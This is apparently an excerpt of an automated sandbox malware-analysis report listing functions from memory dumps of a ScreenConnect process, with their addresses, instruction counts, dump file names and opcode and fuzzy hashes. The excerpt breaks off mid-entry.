Opcode Fuzzy Hash: bff83f2a6031aebcc38ce6d8c44d47900964b245aa44370332c7cb5a62c28a2c
Instruction Fuzzy Hash: 3611E170F00208AFDF28CA69D840AAFBBF6AFC8700F94C5A9D104D7244E7729901CB90

Function 01D9CBC0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f33a771f0717d8b7d7982bd341b41edfb3eb8e7526c496d697456f8ec970eae0
Instruction ID: 3348246040e1d27a8d6c99c52a9872c6a435e0662b11fc9c86376fe73d20a56c
Opcode Fuzzy Hash: f33a771f0717d8b7d7982bd341b41edfb3eb8e7526c496d697456f8ec970eae0
Instruction Fuzzy Hash: 0011D671A1421DDBDF15DBA8D864AEDBBB1AF89310F00146AD505BB3A0DB741944CBA0

Function 01D98B95 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d67a40aa1344a04bc985bd5877da9e48d5e5b485b027fcc12ad9ed483825491b
Instruction ID: 442e07dfeacda63e6a14b1be8781eb33f07b7150cfd5e6f1bdab0c3937467bab
Opcode Fuzzy Hash: d67a40aa1344a04bc985bd5877da9e48d5e5b485b027fcc12ad9ed483825491b
Instruction Fuzzy Hash: 0F114671A0004DDBCF05DFA8D5808ECBFB2FF86718B48C648E10AAB116CB31E946DB60

Function 01D9CBB0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70909fad8bc60d6286c8e471f3d80df349836bf0596841bcec2d7777a10a3320
Instruction ID: 5711cb4407aec82b9495d902c2c7476f152d61a569848da58f787f67b9b584b8
Opcode Fuzzy Hash: 70909fad8bc60d6286c8e471f3d80df349836bf0596841bcec2d7777a10a3320
Instruction Fuzzy Hash: 40113971914218DBDF15DFA8D8A4AEEBFB1EF49310F00042AD102BB3A0DE781D45CBA4

Function 01D9F9E0 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c54b685731c873111da828c6380aa3c37490473ce0818ffcca77b621713aaf
Instruction ID: 46ca99e3ed3533519b1b7af436854f1b21c4029522a89c4358c8974f10f9579b
Opcode Fuzzy Hash: 14c54b685731c873111da828c6380aa3c37490473ce0818ffcca77b621713aaf
Instruction Fuzzy Hash: 2D01F57120D384AFC7139B6EAC60557BFA9EE87610346849BD185CB263DA64BC09C761

Function 01D98AB0 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14b4e9530e4908c56f265a399343a37bdcec75870db7903c80ff47bd97b2fb6a
Instruction ID: 398bbbb8f49c05da48eedda6bb56f804b364790406ebea586e1e19fa0db1b75a
Opcode Fuzzy Hash: 14b4e9530e4908c56f265a399343a37bdcec75870db7903c80ff47bd97b2fb6a
Instruction Fuzzy Hash: 2211FE3590010ADFCF41DFA8D9409DEBBF5FF49314B508569D605BB251D771AE0ACB90

Function 01D9A9C8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b99d34f70353d68b5462950c0693295474214497923923caf3508caa7be28cf
Instruction ID: 2a952fa331b2f04daf618fd17f8f80fd0c53ee62c1800e4655b216c51252876a
Opcode Fuzzy Hash: 0b99d34f70353d68b5462950c0693295474214497923923caf3508caa7be28cf
Instruction Fuzzy Hash: EE01F932F042159B9F198A5DA81446BBBD9FFC8264715496EE509DB301EFB1DC028BD0

Function 01CBD005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2442868892.0000000001CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cbd000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5ebe56e2d6df6fd80778c3494fbd13239220f0977248ba1f496e67ef0cb7f0d
Instruction ID: e5eefbdcb7a3d2d0a5739737bc7e438790191006a8abcad0d4a2e6f6bf2afa1f
Opcode Fuzzy Hash: c5ebe56e2d6df6fd80778c3494fbd13239220f0977248ba1f496e67ef0cb7f0d
Instruction Fuzzy Hash: 53012D7240E3C09FE7128B259894762BFB4AF43224F19C0DBD9898F1A3C2699845C772

Function 01CBD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2442868892.0000000001CBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1cbd000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 219d5b8b1de401575ad499149c9ca1223e784b6d364d218b5f8016cbcdfe37b2
Instruction ID: 1d73bc83f3dbee2c9a662e175465338f354d462b54f9ff6ef80fadfae74aacc6
Opcode Fuzzy Hash: 219d5b8b1de401575ad499149c9ca1223e784b6d364d218b5f8016cbcdfe37b2
Instruction Fuzzy Hash: 25012B71404340DAF7104E6AEDC4BB7BF98EF413A8F08C01AEE0A8B182C6B9D541C6B1

Function 01D9EAE1 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2641fa9813b9cfbdd80ecbdc39639e6782e99c81da776297fa6e4bb00e55e99
Instruction ID: 4893524ce11c6f42e2041a91fcf6a07c0afdcf817fd2fbb3e90ed455d1368d3d
Opcode Fuzzy Hash: d2641fa9813b9cfbdd80ecbdc39639e6782e99c81da776297fa6e4bb00e55e99
Instruction Fuzzy Hash: 1CF0499694E7C15FD703C228A8A1689BF25DBA3129F5A41DBD4858F0E3E518191B8362

Function 01D9F630 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94c9b0e4b63691964c5bb20dc22b72074b4fa8a21341829fe0958fad43e93f14
Instruction ID: db9d36cc68b791a3ab4bb3451476e8b42017cf2819b2dad4ef0a90fcf1641944
Opcode Fuzzy Hash: 94c9b0e4b63691964c5bb20dc22b72074b4fa8a21341829fe0958fad43e93f14
Instruction Fuzzy Hash: F4F0FC723042456FDF015F946C509EF3FBBFF88264B004016FA05D7251DA319D1597A1

Function 01D98B40 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4035fe1822681ef8864b0134337866e486dad4d218c07480fef7f85af6c38d81
Instruction ID: 85ec518995f78b5984bc197f003642404506095941e4ca989ddc8ec8f6d188fc
Opcode Fuzzy Hash: 4035fe1822681ef8864b0134337866e486dad4d218c07480fef7f85af6c38d81
Instruction Fuzzy Hash: 21012832D0015DDBCF05DFA9E9448CDBBB6EF89314F45852AE505B7251DB30A906CBA0

Function 01D9E260 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eff66460dd417787b5bdc2ec96f299b6d9820ea0e1c684a75f54da18e88f3a48
Instruction ID: 663dfd236fcc350157f75639719800770a3ef27d9398e8a93acfe75ec848aa2c
Opcode Fuzzy Hash: eff66460dd417787b5bdc2ec96f299b6d9820ea0e1c684a75f54da18e88f3a48
Instruction Fuzzy Hash: 51F09771E01119AFCB41DFADD8819DEBBF9EF49214B108165E958E7211E371AA128BD0

Function 01D9BCC8 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb18d4917fb77074c95c9129230557ee04f451440ab5e5bc0cba886cd9201aa0
Instruction ID: 4c9a0c3c8ac6a1252058f13003725427b9b86d8f287764a916398eea2f16eea0
Opcode Fuzzy Hash: cb18d4917fb77074c95c9129230557ee04f451440ab5e5bc0cba886cd9201aa0
Instruction Fuzzy Hash: 8CF05836B092445ADB28CABEA400A9BBBDACBD8220B1480BFE94DC3740E831A4008764

Function 01D9EB91 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6664e266ea25e03d02450c363a4e9e6b6704b67a1e3b55c3f1750c198a62dc5d
Instruction ID: ba54f7dc8cc70fa8b806f09a383685f4518efc933682b2f470be989d19d15e03
Opcode Fuzzy Hash: 6664e266ea25e03d02450c363a4e9e6b6704b67a1e3b55c3f1750c198a62dc5d
Instruction Fuzzy Hash: 87F0E976604244AFCB01CB09D840C9B7FAAEFD9324B14C06BF848C7252D931D9028774

Function 01D90E84 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f73ab8f28f23cf7c56dd8b57d98eeff80a3c42b024e8347b1d2df2181ca965f
Instruction ID: 2c71a97ad17404b438db3bf7d67951953b6516b4ecb2e5bcb5834485f8619e8b
Opcode Fuzzy Hash: 0f73ab8f28f23cf7c56dd8b57d98eeff80a3c42b024e8347b1d2df2181ca965f
Instruction Fuzzy Hash: 93F0FA6A50E2E08FD7020BB8602A2D43FA0DD9355830800CFE2D5CF163E8228C0BCB60

Function 01D90E20 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd2bd80c0b5343923145368ead04253993bf6b580eb18e1650da19a472625554
Instruction ID: fba1bdcec0a6fab391ce9bdcd68ca6b762397519275a0fa4a5bf8da6c0182067
Opcode Fuzzy Hash: cd2bd80c0b5343923145368ead04253993bf6b580eb18e1650da19a472625554
Instruction Fuzzy Hash: 62F0BB72648340DBC71557A874151DE3FA5FFE2251740446FE246CB245DD65DC068B91

Function 01D9F640 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff862f8eb4d53f8d1e5877388cd87b7798093f8a50aadbe01c18ed149f3fecad
Instruction ID: c46d73cf88792e796e1ca2794c5dfb5aea0280ec12e9ccaa610ca24cc78dd117
Opcode Fuzzy Hash: ff862f8eb4d53f8d1e5877388cd87b7798093f8a50aadbe01c18ed149f3fecad
Instruction Fuzzy Hash: D9F089363002196B9F055E989C509AF3FEBFFC8364B00402AFA05D3250DA719C11A7A5

Function 01D9329C Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be73b01174d4c04c228ec3502e86985365e7b88f8fb46848cb7d98e08ccd68dc
Instruction ID: 2c0870161a97a2e68d7975ae20b189b702cb2ca239479959ee7c365ea68869c4
Opcode Fuzzy Hash: be73b01174d4c04c228ec3502e86985365e7b88f8fb46848cb7d98e08ccd68dc
Instruction Fuzzy Hash: B3F0242250D2D15FEB2283B8B8512997FA0FED2214B8945CFD081CB553DA89EA0AC392

Function 01D9FA08 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a0837209f3d147a9c52e026eeea143bd264a89465db19fd1c765850d74391d8
Instruction ID: 413167750eacd069d3307fb2c1a791cc1699f3f1b5005c48a4a4487660806a6e
Opcode Fuzzy Hash: 7a0837209f3d147a9c52e026eeea143bd264a89465db19fd1c765850d74391d8
Instruction Fuzzy Hash: 10F02730700309AB9B11DB9FE89496BFFDAEFC8660341842AD619C7320DFA1FC058790

Function 01D9AA48 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56b460384458f6ffff5def281be1e9eceec30fc5f1dd4a2bbd32b056e272d9e0
Instruction ID: 0c354346cb74755a47deb6f7b3fa08b97a847b5819d00bc62e1e41727f44a3eb
Opcode Fuzzy Hash: 56b460384458f6ffff5def281be1e9eceec30fc5f1dd4a2bbd32b056e272d9e0
Instruction Fuzzy Hash: D3F0E5353043905BEB145E9A78E81AB7FEAFBC9A64F48006EE609C7342CD288C0B4760

Function 01D931E0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 574c46feab2157bbe66a22acd8370c307010b3fa6d1390efa8745c19a0a1072d
Instruction ID: 0ae841345d6df3e6add9a296c8ed443b5e6230bb51e63dab0b186642beb66f60
Opcode Fuzzy Hash: 574c46feab2157bbe66a22acd8370c307010b3fa6d1390efa8745c19a0a1072d
Instruction Fuzzy Hash: 51F04930809289EFEF05DBA8E48529CBFB0FB45640F5040E9C505AB241DB385F45EB41

Function 01D931F0 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cfe788a42b3faf8db85b3a9a98f083f1669b841b58c34f8090ec07c6a47674b
Instruction ID: 0903811fe54e36a2818ea3f68e97e7d4a9c0ef775521e6fa3207487355971553
Opcode Fuzzy Hash: 5cfe788a42b3faf8db85b3a9a98f083f1669b841b58c34f8090ec07c6a47674b
Instruction Fuzzy Hash: EBF0E230E0424DEFEF04EBA8D48869CBFF1FB45244F5040A9C505AB240DB34AE44EB41

Function 01D9BCBA Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 788cec7b90b0aeadbc36bc5b0729e8f985ceaf459baa2aac47241a4405cbdb91
Instruction ID: c1c42b1164fd960044805b71e5237da7cdb549f83ce3d46e1516fb9deb6bccd5
Opcode Fuzzy Hash: 788cec7b90b0aeadbc36bc5b0729e8f985ceaf459baa2aac47241a4405cbdb91
Instruction Fuzzy Hash: C6F0A072A0E3811EC729CA7AA844987BFD98E86220709C1BFE49DC3182E9209401C320

Function 01D9E2AA Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75a4313a737054d5db2314137fe4322cd71f1d87c90d7ad87efbf2abc9c4363c
Instruction ID: bad07f4facced06c089b7a15f9f6c2bccb265f5381bf8c007fad1ac7444f7f30
Opcode Fuzzy Hash: 75a4313a737054d5db2314137fe4322cd71f1d87c90d7ad87efbf2abc9c4363c
Instruction Fuzzy Hash: DCF0DA31700114CFDB55DF6DD454AAEBBE1EF88350B0580A9E909DB364DB34DD11DB91

Function 01D9EBA0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d2765e35454b93226cee77072ab7cd7c5c0c025fe0d8255fe825de519af5320
Instruction ID: 4e00dcb11335d8aa00469893b6bae5bd10bd9e832d2ccf1cc609fca0c7759d6a
Opcode Fuzzy Hash: 2d2765e35454b93226cee77072ab7cd7c5c0c025fe0d8255fe825de519af5320
Instruction Fuzzy Hash: B7E06D76704218AF4F04CA4ED800DABBBEAEFC8224714C16AF90DC7311DA31ED528BB4

Function 01D95920 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfdb73b2b7cecb8d7cc1306532c9b83791a6bfee1dc2bb14762500704c4e52ad
Instruction ID: 00168f580bb7ab2a81f39a3d4c1eb1cab41e462b8322fde268ce6ee27207b773
Opcode Fuzzy Hash: dfdb73b2b7cecb8d7cc1306532c9b83791a6bfee1dc2bb14762500704c4e52ad
Instruction Fuzzy Hash: BCE022323112049BDB446BB9B46849D3FAAEBEA271314406BE50AC33C1CE289C03E3A5

Function 01D952E8 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a0861fe30072081cc62ae064a7ae5521182bc9203cdd17cb411b9e4c13d99e3
Instruction ID: bc5f23a2d5c7091a2a890c69e8147f421959c0949fa178010e89d95f268a018c
Opcode Fuzzy Hash: 7a0861fe30072081cc62ae064a7ae5521182bc9203cdd17cb411b9e4c13d99e3
Instruction Fuzzy Hash: E9E022B1A483446FCB0887A8A4104ECBFF8EF86220F1080AFC00DD3342D93988434750

Function 01D9E270 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffc145cc7818219df9ce97281c47b64a50c8734b41d0f742c971b9abed8d0145
Instruction ID: 729ff06cd00fbcfd8608ee85665f39264ea9e36ba5d18fda322ee954981952b8
Opcode Fuzzy Hash: ffc145cc7818219df9ce97281c47b64a50c8734b41d0f742c971b9abed8d0145
Instruction Fuzzy Hash: 27F0D471E00219DF8B40DFADC84169EFBF4EF49200B60C16AD918E7211E331AA12CFC0

Function 01D9AA58 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82d2a6600d2c73352ff2bccdd9ed6786c9f95edf1f388fc8d0fb8d7f97d7747c
Instruction ID: 2012db06a4a31e630beebf79248d73540b2611b343cd9c7a228b58aacebdf4f5
Opcode Fuzzy Hash: 82d2a6600d2c73352ff2bccdd9ed6786c9f95edf1f388fc8d0fb8d7f97d7747c
Instruction Fuzzy Hash: 0DE04F363003515B9B142A9A749852BBADEFBC8A61F58443DF60AC3340CE699C095794

Function 01D9DF09 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b27bbd1872ab1b9721587f9d38d5fd99cc2e5cfe155f5f2672c2e71f200e044
Instruction ID: 525f90a509564108c54002dbba9b396b3c02c840a7bb327d34e0985e0bbaeb34
Opcode Fuzzy Hash: 0b27bbd1872ab1b9721587f9d38d5fd99cc2e5cfe155f5f2672c2e71f200e044
Instruction Fuzzy Hash: 71E0D8654097C4AFEF139A94D8951C23F54FF1B13A7C4408BD480C6103F324984ACB22

Function 01D90E30 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6efb9f16633615b74736d058e415078ce62e5127a68105f239b88c2b2856cb3b
Instruction ID: 5c77e843f95e3928409eada5e6ca48e88d3da6e2528899b4b2fe1630deb4b00d
Opcode Fuzzy Hash: 6efb9f16633615b74736d058e415078ce62e5127a68105f239b88c2b2856cb3b
Instruction Fuzzy Hash: AEE04832304200DB871577EDB4055DF7B95EFD5655750956ED206CB304DE62EC068FD1

Function 01D9F950 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b265a535a896080585dae2390f8ebf0fec8c0ba223c181c9addc98964a753635
Instruction ID: 003fd54497dc6e29b437834ae107a12e92e4c8b5734c26189a6adf52fbad855b
Opcode Fuzzy Hash: b265a535a896080585dae2390f8ebf0fec8c0ba223c181c9addc98964a753635
Instruction Fuzzy Hash: 86E02632B012094BC304955AF890957F3AAEBC96A0F510479D10CC7315CD729C028690

Function 01D9F94F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 061379b5a838d705ed3ee4a198717913e91da36d222d95cbdd4fe8e7ce5ca1db
Instruction ID: 3a1bc2b3de6159989a1c21b3e8457be2a6736b1da5192ca0043fd532d943da96
Opcode Fuzzy Hash: 061379b5a838d705ed3ee4a198717913e91da36d222d95cbdd4fe8e7ce5ca1db
Instruction Fuzzy Hash: 0BE0DF32B012054FC3149669F8909ABF3AAEBC97A0F61447ED10DD7315CD728C028A50

Function 01D93257 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3dd8dcf8425d59f3610985ac14010a0801ad15fefa3e8baa6e20c6747f56e34
Instruction ID: 9f8dc92c0ca84fd3eee6785bbe7bbe6b82f947f7ad27491e831115d83acf650b
Opcode Fuzzy Hash: d3dd8dcf8425d59f3610985ac14010a0801ad15fefa3e8baa6e20c6747f56e34
Instruction Fuzzy Hash: FDE0222220D6C64BC722D66CFC806CD7FA1AFC2200F0849DED04087043CAA1EA0A83C1

Function 01D95930 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9de1f7c4e978fb80ffea086aeb12f3008dc0c214a03580d3fd45eb60dddcd1
Instruction ID: 33b4930d97ddfa2a0053cf3d99a9b331f8898e49eb0e47b64e65c042673d8de0
Opcode Fuzzy Hash: 2f9de1f7c4e978fb80ffea086aeb12f3008dc0c214a03580d3fd45eb60dddcd1
Instruction Fuzzy Hash: 45E08636311110D7D7446A7DE40846E7B9AEBE92713104126E506D3384CF34DC02E794

Function 01D95400 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5563ff1d93cff0af0b40e7914fc2571f2e6269510b3bf27242f53b8d79f0ad1
Instruction ID: 2201c046b42e8a6d0e9f1703e84e7fc5afa19346a451d8641917e90a98954b1b
Opcode Fuzzy Hash: a5563ff1d93cff0af0b40e7914fc2571f2e6269510b3bf27242f53b8d79f0ad1
Instruction Fuzzy Hash: F7E08630645344CFDB56CB28E6059117FB4AF1565134681FBE948CB633C335C801CB11

Function 01D95979 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2443160556.0000000001D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1d90000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef2c876afcbe3a8dbdd78eac480927b6d7a1045644c2653a3bbf2ff77709dd19
Instruction ID: 6eb10f1189883b53929f59809e5991dcbecd9a667b2841715076bc8d72cc7628
